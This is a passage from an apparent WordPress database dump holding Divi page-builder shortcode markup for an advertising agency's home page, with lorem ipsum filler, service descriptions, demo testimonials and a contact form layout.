_builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:18:38','2020-08-07 20:18:38','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(608,1,'2020-08-07 20:18:57','2020-08-07 20:18:57','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" 